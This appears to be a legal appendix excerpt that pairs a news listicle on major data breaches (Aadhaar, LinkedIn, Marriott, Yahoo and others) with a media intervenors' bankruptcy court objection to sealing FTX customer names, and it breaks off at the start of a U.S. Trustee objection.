The actors infiltrated the Aadhaar database through the website of Indane, a state-owned utility company connected to the government database through an application programming interface that allowed applications to retrieve data stored by other applications or software. Unfortunately, Indane's API had no access controls, thus rendering its data vulnerable. Hackers sold access to the data for as little as $7 via a WhatsApp group. Despite warnings from security researchers and tech groups, it took Indian authorities until March 23, 2018, to take the vulnerable access point offline.

## 2. Alibaba [tie with Aadhaar]

**Date:** November 2019
**Impact:** 1.1 billion pieces of user data

Over an eight-month period, a developer working for an affiliate marketer scraped customer data, including usernames and mobile numbers, from the Alibaba Chinese shopping website, Taobao, using crawler software that he created. It appears the developer and his employer were collecting the information for their own use and did not sell it on the black market, although both were sentenced to three years in prison.

A <u>Taobao spokesperson said in a statement</u>: "Taobao devotes substantial resources to combat unauthorized scraping on our platform, as data privacy and security is of utmost importance. We have proactively discovered and addressed this unauthorized scraping. We will continue to work with law enforcement to defend and protect the interests of our users and partners."

---

## 4. LinkedIn

**Date:** June 2021
**Impact:** 700 million users

Professional networking giant LinkedIn saw data associated with 700 million of its users posted on a dark web forum in June 2021, impacting more than 90% of its user base. A hacker going by the moniker of "God User" used data scraping techniques by exploiting the site's (and others') API before dumping a first information data set of around 500

**A0469**

million customers. They then followed up with a boast that they were selling the full 700 million customer database. While LinkedIn argued that as no sensitive, private personal data was exposed, the incident was a violation of its terms of service rather than a data breach, a scraped data sample posted by God User contained information including email addresses, phone numbers, geolocation records, genders and other social media details, which would give malicious actors plenty of data to craft convincing, follow-on social engineering attacks in the wake of the leak, as <u>warned by the UK's NCSC</u>.

## 5. Sina Weibo

**Date:** March 2020
**Impact:** 538 million accounts

With over 600 million users, Sina Weibo is one of China's largest social media platforms. In March 2020, the company announced that an attacker obtained part of its database, impacting 538 million Weibo users and their personal details including real names, site usernames, gender, location, and phone numbers. The attacker is reported to have then sold the database on the dark web for $250.

---

China's Ministry of Industry and Information Technology (MIIT) ordered Weibo to enhance its data security measures to better protect personal information and to notify users and authorities when data security incidents occur. In a <u>statement</u>, Sina Weibo argued that an attacker had gathered publicly posted information by using a service meant to help users locate the Weibo accounts of friends by inputting their phone numbers and that no passwords were affected. However, it admitted that the exposed data could be used to associate accounts to passwords if passwords are reused on other accounts. The company said it strengthened its security strategy and reported the details to the appropriate authority.

## 6. Facebook

**Date:** April 2019
**Impact:** 533 million users

In April 2019, it was revealed that two datasets from Facebook apps had been exposed to the public internet. The information related to more than 530 million Facebook users and included phone numbers, account names, and Facebook IDs. However, two years later (April 2021) the data was posted for free, indicating new and real criminal intent surrounding the data. In fact, given the sheer number of phone numbers impacted and readily available on the dark web as a result of the incident, security researcher Troy Hunt added functionality to his HaveIBeenPwned (HIBP) breached credential checking site that would allow users to verify if their phone numbers had been included in the exposed dataset.

"I'd never planned to make phone numbers searchable," Hunt wrote in blog post. "My position on this was that it didn't make sense for a bunch of reasons. The Facebook data changed all that. There's over 500 million phone numbers but only a few million email addresses so >99% of people were getting a miss when they should have gotten a hit."



*SponsoredPost* Sponsored by NYU Stern
5 Reasons to Choose the NYU Stern EMBA Program

# 7. Marriott International (Starwood)

**Date:** September 2018
**Impact:** 500 million customers

Hotel Marriot International announced the exposure of sensitive details belonging to half a million Starwood guests following an attack on its systems in September 2018. In a statement published in November the same year, the hotel giant said: "On September 8, 2018, Marriott received an alert from an internal security tool regarding an attempt to access the Starwood guest reservation database. Marriott quickly engaged leading security experts to help determine what occurred."

Marriott learned during the investigation that there had been unauthorized access to the Starwood network since 2014. "Marriott recently discovered that an unauthorized party had copied and encrypted information and took steps towards removing it. On November 19, 2018, Marriott was able to decrypt the information and determined that the contents were from the Starwood guest reservation database," the statement added.

The data copied included guests' names, mailing addresses, phone numbers, email addresses, passport numbers, Starwood Preferred Guest account information, dates of birth, gender, arrival and departure information, reservation dates, and communication preferences. For some, the information also included payment card numbers and expiration dates, though these were apparently encrypted.

Marriot carried out an investigation assisted by security experts following the breach and announced plans to phase out Starwood systems and accelerate security enhancements to its network. The company was eventually <u>fined £18.4 m</u>illion (reduced from £99 million) by UK data governing body the Information Commissioner's Office (ICO) in 2020 for failing to keep customers' personal data secure. An article by <u>New York Times</u> attributed the attack to a Chinese intelligence group seeking to gather data on US citizens.

# 8. Yahoo

**Date:** 2014
**Impact:** 500 million accounts

Making its second appearance in this list is Yahoo, which suffered an attack in 2014 separate to the one in 2013 cited above. On this occasion, state-sponsored actors stole data from 500 million accounts including names, email addresses, phone numbers, hashed passwords, and dates of birth. The company took initial remedial steps back in 2014, but it wasn't until 2016 that Yahoo went public with the details after a stolen database went on sale on the black market.

# 9. Adult Friend Finder

**Date:** October 2016
**Impact:** 412.2 million accounts

**A0472**

The adult-oriented social networking service The FriendFinder Network had 20 years' worth of user data across six databases stolen by cyber-thieves in October 2016. Given the sensitive nature of the services offered by the company – which include casual hookup and adult content websites like Adult Friend Finder, Penthouse.com, and Stripshow.com – the breach of data from more than 414 million accounts including names, email addresses, and passwords had the potential to be particularly damning for victims. What's more, the vast majority of the exposed passwords were hashed via the notoriously weak algorithm SHA-1, with an estimated 99% of them cracked by the time LeakedSource.com published its analysis of the data set on November 14, 2016.

# 10. MySpace

**Date:** 2013
**Impact:** 360 million user accounts

Though it had long stopped being the powerhouse that it once was, social media site MySpace hit the headlines in 2016 after 360 million user accounts were leaked onto both LeakedSource.com and put up for sale on dark web market The Real Deal with an asking price of 6 bitcoin (around $3,000 at the time).

According to the company, lost data included email addresses, passwords and usernames for "a portion of accounts that were created prior to June 11, 2013, on the old Myspace platform. In order to protect our users, we have invalidated all user passwords for the affected accounts created prior to June 11, 2013, on the old Myspace platform. These users returning to Myspace will be prompted to authenticate their account and to reset their password by following instructions."

It's believed that the passwords were stored as SHA-1 hashes of the first 10 characters of the password converted to lowercase.

# 11. NetEase

**Date:** October 2015
**Impact:** 235 million user accounts

NetEase, a provider of mailbox services through the likes of 163.com and 126.com, reportedly suffered a breach in October 2015 when email addresses and plaintext passwords relating to 235 million accounts were being sold by dark web marketplace vendor DoubleFlag. NetEase has maintained that no data breach occurred and to this <u>day HIBP states</u>: "Whilst there is evidence that the data itself is legitimate (multiple HIBP subscribers confirmed a password they use is in the data), due to the difficulty of emphatically verifying the Chinese breach it has been flagged as "unverified.""

## 12. Court Ventures (Experian)

**Date:** October 2013
**Impact:** 200 million personal records

Experian subsidiary Court Ventures fell victim in 2013 when a Vietnamese man <u>tricked it</u> into giving him access to a database containing 200 million personal records by posing as a private investigator from Singapore. The details of Hieu Minh Ngo's exploits only came to light following his arrest for selling personal information of US residents (including credit card numbers and Social Security numbers) to cybercriminals across the world, something he had been doing since 2007. In March 2014, he pleaded guilty to multiple charges including identity fraud in the US District Court for the District of New Hampshire. The DoJ stated at the time that Ngo had made a total of $2 million from selling personal data.

## 13. LinkedIn

**Date:** June 2012
**Impact:** 165 million users

With its second appearance on this list is LinkedIn, this time in reference to a breach it suffered in 2012 when it announced that 6.5 million unassociated passwords (unsalted SHA-1 hashes) had been stolen by attackers and posted onto a Russian hacker forum. However, it wasn't until 2016 that the full extent of the incident was revealed. The same hacker selling MySpace's data was found to be offering the email addresses and

passwords of around 165 million LinkedIn users for just 5 bitcoins (around $2,000 at the time). LinkedIn acknowledged that it had been made aware of the breach, and said it had reset the passwords of affected accounts.

## 14. Dubsmash

**Date:** December 2018
**Impact:** 162 million user accounts

In December 2018, New York-based video messaging service Dubsmash had 162 million email addresses, usernames, PBKDF2 password hashes, and other personal data such as dates of birth stolen, all of which was then put up for sale on the Dream Market dark web market the following December. The information was being sold as part of a collected dump also including the likes of MyFitnessPal (more on that below), MyHeritage (92 million), ShareThis, Armor Games, and dating app CoffeeMeetsBagel.

Dubsmash acknowledged the breach and sale of information had occurred and provided advice around password changing. However, it failed to state how the attackers got in or confirm how many users were affected.

## 15. Adobe

**Date:** October 2013
**Impact:** 153 million user records

In early October 2013, Adobe reported that hackers had stolen almost three million encrypted customer credit card records and login data for an undetermined number of user accounts. Days later, Adobe increased that estimate to include IDs and encrypted passwords for 38 million "active users." Security blogger Brian Krebs then reported that a file posted just days earlier "appears to include more than 150 million username and hashed password pairs taken from Adobe." Weeks of research showed that the hack had also exposed customer names, password, and debit and credit card information. An agreement in August 2015 called for Adobe to pay $1.1 million in legal fees and an

undisclosed amount to users to settle claims of violating the Customer Records Act and unfair business practices. In November 2016, the amount paid to customers was reported to be $1 million.

**Next read this**

- *The 10 most powerful cybersecurity companies*

- *7 hot cybersecurity trends (and 2 going cold)*

- *The Apache Log4j vulnerabilities: A timeline*

- *Using the NIST Cybersecurity Framework to address organizational risk*

- *11 penetration testing tools the pros use*

Copyright © 2022 IDG Communications, Inc.

💡 **7 hot cybersecurity trends (and 2 going cold)**

**SPONSORED LINKS**

**dtSearch® - INSTANTLY SEARCH TERABYTES of files, emails, databases, web data. 25+ search types; Win/Lin/Mac SDK; hundreds of reviews; full evaluations**

Copyright © 2023 IDG Communications, Inc.

IN THE UNITED STATES BANKRUPTCY COURT
FOR THE DISTRICT OF DELAWARE

|  |  |
|---|---|
| In re<br>FTX Trading Ltd., et al.,<br>*Debtors*. | Chapter 11<br>Case No. 22-11068-JTD<br>(Jointly Administered)<br><br>Re: 1324<br><br>Objection Deadline:<br>May 4, 2023 at 4:00 p.m. (ET)<br><br>Hearing Date:<br>May 17, 2023 at 1:00 p.m. (ET) |

**MEDIA INTERVENORS' OBJECTIONS TO THE
JOINT MOTION OF THE DEBTORS AND THE OFFICIAL COMMITTEE OF
UNSECURED CREDITORS FOR AN ORDER AUTHORIZING THE MOVANTS TO
REDACT OR WITHHOLD CERTAIN CONFIDENTIAL INFORMATION OF
CUSTOMERS AND PERSONAL INFORMATION OF INDIVIDUALS**

Media Intervenors -- Bloomberg L.P., Dow Jones & Company, Inc., The New York Times Company and The Financial Times Ltd. -- hereby object to the joint motion of the Debtors and the Official Committee of Unsecured Creditors (together, "Movants") for an order authorizing them to redact or withhold certain confidential information of customers and personal information of individuals, D.I. 1324.[1]  Because of the substantial overlap between the arguments made in support of Movants' instant motion and the arguments made by the Ad Hoc Committee of Non-US Customers in support of their motion to seal, D.I. 1137, Media Intervenors hereby incorporate by reference their objections to the motion of the Ad Hoc Committee of Non-US Customers, including their objections to any extension or continuance of the redaction deadline. D.I. 1226.

---

[1] FTX Trading Ltd.'s and Alameda Research LLC's tax identification numbers are 3288 and 4063, respectively. Due to the large number of debtor entities in these Chapter 11 cases, a complete list of the Debtors and the last four digits of their federal tax identification numbers is not provided herein.  A complete list of such information may be obtained on the website of the Debtors' claims and noticing agent at https://cases.ra.kroll.com/FTX.

1

## BACKGROUND

1. On November 11, 2022, Debtors petitioned for relief under Chapter 11 of the Bankruptcy Code. D.I. 1. On November 19, 2022, Debtors moved for leave to file a consolidated Creditor Matrix containing the names and addresses of their creditors. D.I. 45 at 3–4, ¶ 6. Simultaneously, Debtors sought leave pursuant to 11 U.S.C. § 107(b)(1) to redact the names and addresses of their customers in all publicly filed versions of the Creditor Matrix and Consolidated Top 50 Creditors List and Schedules and Statements. D.I. 45 at 5–6, ¶ 12.

2. On December 9, 2022, Media Intervenors moved to intervene for the limited purpose of opposing the redaction of the creditors' names; Media Intervenors' motion set forth their objections to Debtors' proposed redactions. D.I. 196.

3. On December 12, 2022, the U.S. Trustee filed objections to, in relevant part, Debtors' proposed redaction of their creditors' names. D.I. 200.

4. On December 19, 2022, the Court granted Media Intervenors' motion to intervene. D.I. 255.

5. On January 8, 2023, Debtors filed a reply to the objections of Media Intervenors and the U.S. Trustee, D.I. 407, accompanied by the declaration of Kevin M. Cofsky (the "Cofsky Declaration"). D.I. 411. On reply, Debtors limited their request to seal the names of *some* creditors to a period of six months, subject to extension. D.I. 407 at 5, ¶ 10. Debtors maintained, however, their request to permanently redact the names of customers "who are citizens of countries protected by the GDPR."[2] *Id.* at ¶ 30.

---

[2] Debtors also sought to "reserve all rights with respect to seeking to permanently redact names of creditors who are citizens of other countries with similar laws if subsequently advised by counsel to be necessary." D.I. 407 at 12 n.9.

6. On January 11, 2023, the Court held a hearing (the "Second Day Hearing") on, *inter alia*, Debtors' request to redact the names of their customers, at which the Court heard testimony from Mr. Cofsky. D.I. 489. On January 20, 2023, the Court entered an Order (the "Redaction Order") granting final relief as to some portions of Debtors' sealing request and interim relief as to other portions. D.I. 545. The Court authorized Debtors "to redact the addresses and email addresses of their creditors and equity holders who are natural persons from any filings." *Id.* at ¶ 5. The Court also authorized Debtors, pursuant to 11 U.S.C. § 107(b)(1), to redact the names of "all customers," and the "addresses and email addresses of customers who are not natural persons," for a period of 90 days (the "Redaction Period")—*i.e.*, until April 20, 2023 (the "Redaction Deadline"). D.I. 545, ¶ 4. Finally, the Court authorized Debtors to redact the names and addresses of "any creditors or equity holders" who are "natural persons and who are protected by the GDPR" until the Redaction Deadline. *Id.* at ¶ 6.

7. On March 22, 2023, the Ad Hoc Committee of Non-US Creditors (the "Non-US Creditors") filed its own motion to seal, seeking to redact the names of its members in certain filings required by the Bankruptcy Code. D.I. 1137. The Non-US Creditors' motion made arguments under 11 U.S.C. § 107(b)(1) and § 107(c). *Id.* The Non-US Creditors' arguments under § 107(b) were substantially identical to those brought by Debtors, while the Non-US Creditors' arguments under § 107(c) expanded on those brought by Debtors. *Id.*

8. Media Intervenors timely objected to the Non-US Creditors' motion to seal (the "April 5 Objections"). D.I. 1226. In their April 5 Objections, Media Intervenors explained that there was no basis in the record for either (i) extending the 90-day Redaction Period pursuant to § 107(b)(1), or (ii) finding that public access to the names of FTX's customer-creditors would expose them to undue risk of identity theft or other unlawful injury pursuant to § 107(c). *Id.*

A0479

9. On April 20, 2023, Movants filed a motion to (i) extend the Redaction Period for an additional 90 days pursuant to § 107(b)(1); (ii) permanently seal the names of FTX's individual customer-creditors pursuant to § 107(c); and (iii) permanently seal the names of FTX's individual customer-creditors subject to certain non-U.S. privacy laws. D.I. 1324.

10. Movants proffered no new evidence in support of their arguments for redaction under § 107(b) and foreign law. In support of their argument for redaction under § 107(c), they submitted the declaration of Jeremy A. Sheridan (the "Sheridan Declaration"), accompanied by several hundred pages of exhibits. D.I. 1325, 1325-1.

## ARGUMENT

**A.  THE RECORD DOES NOT ESTABLISH THAT THE NAMES OF FTX'S CUSTOMER-CREDITORS CONSTITUTE CONFIDENTIAL COMMERCIAL INFORMATION UNDER § 107(B).**

11. Movants seek a 90-day extension of the Redaction Period pursuant to 11 U.S.C. § 107(b)(1), which permits bankruptcy courts to protect information constituting "a trade secret or confidential research, development, or commercial information." *Id.*; D.I. 1324, ¶ 21-22. To establish that the names of FTX's customer-creditors constitute confidential commercial information, Movants rely on the testimony given by Mr. Cofsky at the Second Day Hearing. *Id.* There, Mr. Cofksy testified that if FTX's customer-creditors' names were disclosed, competitors might be able to find their contact information and woo them away from FTX, thereby reducing the value of Debtors' estate. Tr. of Second Day Hrg. 33:19–36:3.

12. The Court previously deemed this evidence sufficient to warrant sealing the names of FTX's customer-creditors for 90 days—a time period calculated to maintain the status quo while Debtors explored potential valuations of FTX's assets. D.I. 545. For the reasons stated in the

April 5 Objections, Mr. Cofsky's testimony does not justify further or continued sealing. *See* D.I. 1226, ¶ 26–38.

13. To start, Mr. Cofksy's testimony provides no basis for the continued sealing of Debtors' top 50 creditors or its institutional creditors. Even if, *arguendo*, the record was sufficient to establish that FTX's customer-creditor list *as a whole* constituted confidential commercial information within the meaning of § 107(b)(1)—which it is not—Movants have made no showing that the names of the relatively small subset of customers that comprise FTX's top 50 creditors constitute confidential commercial information. D.I. 1226, ¶ 47-48. Thus, even if the Court permits Movants to redact the names of most of FTX's customer-creditors for an additional 90 days pursuant to § 107(b)(1), it should nevertheless hold that the public's presumptive right of access is not overcome as to (a) the names of FTX's customers who are also among Debtors' top 50 creditors; or (b) at minimum, the names of FTX's *institutional* customers who are among Debtors' top 50 creditors.

14. That said, the Court should not extend the Redaction Deadline at all. Mr. Cofsky's testimony -- the crux of Movants' evidence in support of redaction—was based on a transparently unreliable experiment: his staff selected a handful of FTX's customer-creditors—fewer than 20 with non-generic names -- and ran unspecified internet searches that they believed led them to some unspecified form of contact information for more than half of those customer-creditors. Tr. of Second Day Hrg. 33:19–36:3. Mr. Cofsky did not testify that he or his staff validated the results of this experiment -- *e.g.*, by determining whether they had located accurate, current contact information for the individuals they had searched for, or whether they had, in fact, located contact information for the correct individuals. *See id*.

5

**A0481**

15.  At most, Mr. Cofsky's testimony establishes that if FTX's approximately nine million customer-creditors were named in public filings, an unknown number of unidentified competitors of FTX might Google (or otherwise search for) an unknown number of them in an attempt to discover their contact information; in doing so, these unknown competitors might succeed in discovering the contact information of an unknown percentage of FTX's individual creditors with non-generic names—some or all of whom may also be FTX customers, and some or all of whom, if customers at all, may *already* be customers of competing crypto exchanges.  This is speculation all the way down. The public's presumptive right of access to bankruptcy filings, 11 U.S.C. § 107(a), cannot be overcome by such conjecture. *In re Purdue Pharma LP*, 632 B.R. 34, 40 (Bankr. S.D.N.Y. 2021) (holding that a "request under § 107(b)(1) should be supported by specific evidence, not argument or conclusory statements in a declaration, to establish the exception").

16.  As Media Intervenors explained in their April 5 Objections, D.I. 1226, ¶ 31–34, the issue presented here is strikingly similar to the one faced by the Bankruptcy Court for the Southern District of New York in *In re Celsius Network, LLC*, 644 B.R. 276, 282 (Bankr. S.D.N.Y 2022). The debtors in *Celsius* -- a cryptocurrency exchange and affiliated entities -- argued that if the names of their customer-creditors were "publicly disclosed[,] their competitors would gain a 'significant competitive advantage by having access to the complete list of the Debtors' worldwide customer base,' which 'would significantly decrease the value of the customer list as an asset in any future potential asset sale.'" *Id.* The court disagreed, noting two logical gaps fatal to the debtors' arguments.  First, the court observed that the debtors' activity "ha[d] not won many fans among [d]ebtors' customers" and that the "[d]ebtors' business model [had] substantially changed." *Id.* at 291.  Second, the debtors "fail[ed] to address with evidence whether creditors who deposited crypto assets with the [d]ebtors also maintain accounts with the [d]ebtors' competitors." *Id.* at

6

A0482

292. The same reasoning applies here and should lead to the same result. *See* D.I. 1226, ¶ 32–39 (explaining the applicability of *Celsius* and other analogous caselaw).

17. Accordingly, and for the reasons set forth in Media Intervenors' April 5 Objections, the record fails to establish that the names of FTX's customers—and especially the names of FTX's customers who are also among Debtors' top 50 creditors—constitute confidential commercial information within the meaning of § 107(b)(1). Continued sealing of those names is, therefore, unwarranted.

**B.    THE RECORD DOES NOT ESTABLISH THAT DISCLOSING THE NAMES OF FTX'S INDIVIDUAL CUSTOMER-CREDITORS WILL SUBJECT THEM TO AN "UNDUE RISK" OF IDENTITY THEFT OR OTHER UNLAWFUL INJURY.**

18. Movants also seek to permanently redact the names of FTX's individual customer-creditors pursuant to 11 U.S.C. § 107(c). D.I. 1324-2, ¶ 4. Under § 107(c), a bankruptcy court may order certain information redacted "for cause"—*i.e.*, if the court finds that disclosure "would create *undue* risk of identity theft or other unlawful injury to the individual or the individual's property." *Id.* (emphasis added). Here, no such cause exists.

19. As Media Intervenors explained in their April 5 Objections, D.I. 1226, ¶ 56, public access to the names of the parties in bankruptcy proceedings does not inherently expose them to an "*undue* risk of identity theft or other unlawful injury." 11 U.S.C. § 107(c) (emphasis supplied); *In re Avaya, Inc.*, 2019 WL 1750908 at *6 (Bankr. S.D.N.Y. 2019) ("If a desire for secrecy or general fear of identity theft constituted cause for redaction, a court would have to seal or redact all personal information in every case.").

20. Indeed, almost everyone who participates in bankruptcy proceedings does so openly. That is what § 107(a) and the First Amendment require. *In re Blake*, 452 B.R. 1, 10 (Bankr. D. Mass. 2011) ("[T]he presumption of public access to documents filed in a bankruptcy case is

paramount…"); *In re Anthracite Cap., Inc.*, 492 B.R. 162, 171 (Bankr. S.D.N.Y. 2013) ("A court's ability to limit the public's right to access remains an extraordinary measure that is warranted only under rare circumstances as public monitoring is an essential feature of democratic control") (internal quotation marks omitted); *In re Crawford*, 194 F.3d 954, 960 (9th Cir. 1999) (explaining that the government's interest in ensuring public access to court records "is of special importance in the bankruptcy arena, as unrestricted access to judicial records fosters confidence among creditors regarding the fairness of the bankruptcy system").

21. What Movants ask is for this Court to recognize a novel and sweeping exception to this requirement of transparency for those bankruptcy proceedings involving cryptocurrency exchanges. According to Movants, FTX's individual customer-creditors are different because they have chosen to use cryptocurrency. But there is no legal basis for giving crypto users the ability to participate in bankruptcy proceedings anonymously. And nothing in the record, including in the Sheridan Declaration, supports such an exception.

22. Movants try but fail to demonstrate that disclosure of the names of crypto users -- including FTX's individual customer-creditors -- would render them more vulnerable to unlawful injury than other named participants in bankruptcies. Quoting the Sheridan Declaration, Movants assert that "malefactors typically target (x) consumers they believe to be holders of cryptocurrency and (y) consumers who are in a vulnerable state, including because they have sums of money tied up in bankruptcy proceedings." D.I. 1325, ¶ 8.

23. The hundreds of pages of whitepapers, news articles, and legal filings attached to the Sheridan Declaration, however, tell a different story. *See generally* D.I. 1325-1. They reveal that some wrongdoers *use crypto* to launder money swindled from their victims; critically, however, the methods employed by said wrongdoers are not tailored to, nor uniquely effective against,

8

*crypto users*.[3] *See, e.g.*, D.I. 1325-1 at 132 (whitepaper describing scams in which fraudsters use crypto to hide money stolen from victims). Quite the opposite.

24. According to Mr. Sheridan's own exhibits, scammers in the crypto context do what they do in most other contexts: convince a trusting or distracted person to click on a malicious link, respond to a phony email, buy into a bogus investment, or send money to a celebrity or invented romantic partner. *See, e.g.*, *id.* (describing varieties of scams); *id.* at 43 (general overview of "Business Email Compromise" scam, unconnected to cryptocurrency). Such scams are not new, and crypto users are not unusually vulnerable to them; to the contrary, crypto users tend to be more digitally savvy than the general population and are well-equipped to detect and ignore such scams -- especially when they are warned to be on the lookout for them. *See, e.g.*, *id.* at 37 (news article explaining that users of the Gemini crypto exchange received, detected, and reported phishing emails).

25. Take "pig butchering." This is a cruel and luridly named tactic by which a scammer cultivates a sham friendship with a victim, convinces the victim to invest money in a fake crypto fund, and then makes off with the victim's investment. *See id.* at 144 (portion of whitepaper describing "pig butchering"); *id.* at 155 (news article describing victims of "pig butchering").

26. "In most of these schemes," according to Mr. Sheridan, "the malefactor doesn't know their target prior to executing the fraud *and has to persuade them to set up a cryptocurrency wallet*." D.I. 1325, ¶ 15 (emphasis added). That makes sense, as someone completely unfamiliar with the crypto landscape, who has never created a crypto wallet or used crypto currency, may have

---

[3] Movants do not argue that criminals' use of cryptocurrency makes it inherently risky for FTX's customer-creditors to be identified by name. If they did, the argument would be meritless. FTX's customer-creditors knowingly invested in a novel, volatile, and largely unregulated financial market; they assumed the risks inherent in such investment, and their decision to so invest does not entitle them to anonymity in related bankruptcy proceedings.

difficulty distinguishing between a legitimate investment opportunity and a scam. But FTX's customer-creditors don't fit that bill: they already have crypto wallets and are "already versed in cryptocurrency." *Id.*

27. Thus, while Mr. Sheridan suggests FTX's customer-creditors are more attractive to "malefactors" running a "pig butchering" scam, *id.*, that is illogical, implausible, and unsupported by Mr. Sheridan's own exhibits. Common sense compels the opposite conclusion: people who already know their way around the crypto world are *less* susceptible to "pig butchering" and other cons.

28. *Celsius* bears out this point. Contrary to Movants' assertion, "the disclosure of customer names in *Celsius*" has not "resulted in the exact injury that the court there believed was speculative when initially raised." D.I. 1324, ¶ 27 n.7. Instead -- as demonstrated by Movants' own proffered evidence -- some *Celsius* customers have received phishing emails, which they detected and forwarded to Debtors' counsel of record, who duly posted warnings on the public docket. *See* D.I. 178–198. When the *Celsius* court learned that one of these would-be phishing scams included a fake court order, the court informed the U.S. Marshalls. D.I. 1325-1 at 285 ("In light of the fact that they appear to have taken an order of the Court and used it in part, we will also report it to the U.S. Marshal. Ordinarily they wouldn't get involved, the U.S. Marshall wouldn't be involved. But since they seem to be trying to invoke something that the Court did, we'll make sure we call it to their attention promptly as well.").

29. Despite these scam attempts, the record contains *no evidence* that any individuals named in the *Celsius* litigation have fallen victim to theft—either of their identities or their crypto assets. Little wonder. Phishing emails (often but not always caught by spam filters) are a ubiquitous feature of the digital world; anyone with an email account knows to be wary of them. *See,*

*e.g.*, Federal Trade Commission, *How to Recognize and Avoid Phishing Scams* (Sept. 2022), https://consumer.ftc.gov/articles/how-recognize-and-avoid-phishing-scams. There is no reason to conclude that users of cryptocurrency exchanges are more susceptible to phishing scams than other litigants named in bankruptcy proceedings -- many of whom, like crypto owners, doubtless use the internet to access their bank accounts, credit cards, retirement funds, and other important assets. And, again, common sense suggests that crypto owners, by and large, possess *greater* digital fluency than the average customer or creditor named in bankruptcy court filings and are thus *less* susceptible to phishing attempts.

30. Crypto owners are like everyone else: sometimes, scammers target them. If being targeted by phishing emails and other fraud vectors were enough to justify sealing individuals' names under § 107(c), then virtually every individual party to a bankruptcy proceeding could litigate anonymously. Neither the First Amendment nor the Bankruptcy Code permits that outcome. And nothing in the record supports making a special exception for FTX's individual customer-creditors here.[4]

## C.   THERE IS NO LEGAL BASIS FOR REDACTING THE NAMES OF FTX'S INDIVIDUAL CREDITORS PURSUANT TO FOREIGN DATA PRIVACY LAWS.

31. Finally, "pursuant to section 105 of the Bankruptcy code," Movants seek to permanently seal the names of individual creditors who are protected by the GDPR and "Japan data privacy laws." D.I. 1324, ¶ 35; D.I. 1324-2, ¶ 4. But no part of § 105 permits foreign law to

---

[4] "No compelling reason exists to require disclosure of the Individual Customer Names," Movants write. D.I. 1324, ¶ 34. That gets the law backwards. The public has a *presumptive right* to the names of FTX's customer-creditors—a right that flows from both the First Amendment and the Bankruptcy Code. The question is whether Movants have demonstrated a compelling reason for overcoming that right. They have not.

override the public's qualified right of access to bankruptcy filings under U.S. constitutional and statutory law.

32. Section 105 states that "[t]he court may issue any order, process, or judgment that is necessary or appropriate *to carry out the provisions of this title*." *Id.* (italics added). Here, the relevant provision of "this title" is 11 U.S.C. 107(a), which provides that "a paper filed in a case under this title and the dockets of a bankruptcy court are public records." *Id.*

33. The statute is unambiguous: filings made under the Bankruptcy Code are presumptively public. And while there are exceptions to the requirement of openness, those exceptions are set forth entirely in § 107(b) and (c)—not in § 105, the authority cited by Movants. Neither § 107(b) nor § 107(c) permits the sealing of U.S. bankruptcy filings pursuant to foreign law. Movants do not argue otherwise, effectively conceding the point.[5]

34. Movants' passing invocation of 28 U.S.C. § 959(b) is a red herring. D.I. 1324, ¶ 46. That provision, which appears in a separate title of the U.S. Code, requires a "debtor in possession" to comply with certain laws of U.S. States. 28 U.S.C. § 959(b). It has nothing to do with foreign law, and it most certainly does not provide that when a foreign law conflicts with 11 U.S.C. § 107, the foreign law prevails.

35. At bottom, Movants desire to avoid "enforcement of the public disclosure requirements of U.S. bankruptcy law[,]" D.I. 1324, ¶ 45, furnishes no basis for sealing. The law of the United States -- constitutional and statutory -- guarantees the public a strong presumptive right to

---

[5] Specifically, Movants do not argue that a financial penalty levied under the GDPR or Japanese law would constitute an "unlawful injury" for purposes of 11 U.S.C. § 107(c). Rightly so. As Media Intervenors have explained, "a penalty imposed by operation of law is not generally thought to be 'unlawful.' It is certainly not like 'identity theft,' the only form of 'unlawful injury' expressly identified in § 107(c)." D.I. 1225 ¶ 55 (citing *McDonnell v. United States*, 579 U.S. 550, 568–69 (2016) ("Under the familiar interpretive canon *noscitur a sociis*, a word is known by the company it keeps.")).

inspect bankruptcy filings. That right cannot be abrogated by a party's assertion of legal obligations under foreign law, including a party's desire to avoid paying fines to which it *might* be subject under foreign law.

## **CONCLUSION**

For the foregoing reasons, as well as those set forth in the April 5 Objections, D.I. 1226, Media Intervenors respectfully request that the Court deny Movants' motion to seal.

Respectfully submitted,

Dated: May 3, 2023

/s/ David L. Finger
David L. Finger (ID #2556)
FINGER & SLANINA, LLC
One Commerce Center
1201 N. Orange St., 7th fl.
Wilmington, DE 19801
(302) 573-2525
dfinger@delawgroup.com

Katie Townsend (pro hac vice)
THE REPORTERS COMMITTEE FOR
FREEDOM OF THE PRESS
1156 15th Street NW, Suite 1020
Washington, DC 20005
202.795.9300
ktownsend@rcfp.org

*Counsel for Media Intervenors*

**IN THE UNITED STATES BANKRUPTCY COURT
FOR THE DISTRICT OF DELAWARE**

| | | |
|---|---|---|
| *In re*<br><br>FTX TRADING LTD., *et al.*,[1]<br><br>Debtors. | :<br>:<br>:<br>:<br>:<br>:<br>:<br>:<br>:<br>: | Chapter 11<br><br>Case No. 22-11068 (JTD)<br>(Jointly Administered)<br><br>**Hearing Date:  May 17, 2023, at 9:00 a.m.**<br><br>**Objection Deadline for the U.S. Trustee: May 9, 2023**<br><br>Re:  D.I. 1324, 1137 |

**UNITED STATES TRUSTEE'S OMNIBUS OBJECTION TO (A) JOINT MOTION OF THE DEBTORS AND THE OFFICIAL COMMITTEE OF UNSECURED CREDITORS FOR AN ORDER AUTHORIZING THE MOVANTS TO REDACT OR WITHHOLD CERTAIN CONFIDENTIAL INFORMATION OF CUSTOMERS AND PERSONAL INFORMATION OF INDIVIDUALS, AND (B) THE AD HOC COMMITTEE OF NON-US CUSTOMERS OF FTX.COM'S MOTION TO FILE UNDER SEAL (I) THE VERIFIED STATEMENT OF EVERSHEDS SUTHERLAND (US) LLP AND MORRIS NICHOLS, ARSHT & TUNNELL LLP PURSUANT TO <u>BANKRUPTCY RULE 2019 AND (II) THE SUPPORTING DECLARATION</u>**

Andrew R. Vara, the United States Trustee for Regions Three and Nine (the "<u>U.S. Trustee</u>"), through his undersigned counsel, files this omnibus objection (the "<u>Objection</u>") to the (A) *Joint Motion of the Debtors and the Official Committee of Unsecured Creditors for an Order Authorizing the Movants to Redact or Withhold Certain Confidential Information of Customers and Personal Information of Individuals* [D.I. 1324] (the "<u>Joint Motion</u>"), and (B*) the Ad Hoc Committee of Non-US Customers of FTX.Com's Motion to File Under Seal (I) the Verified*

---

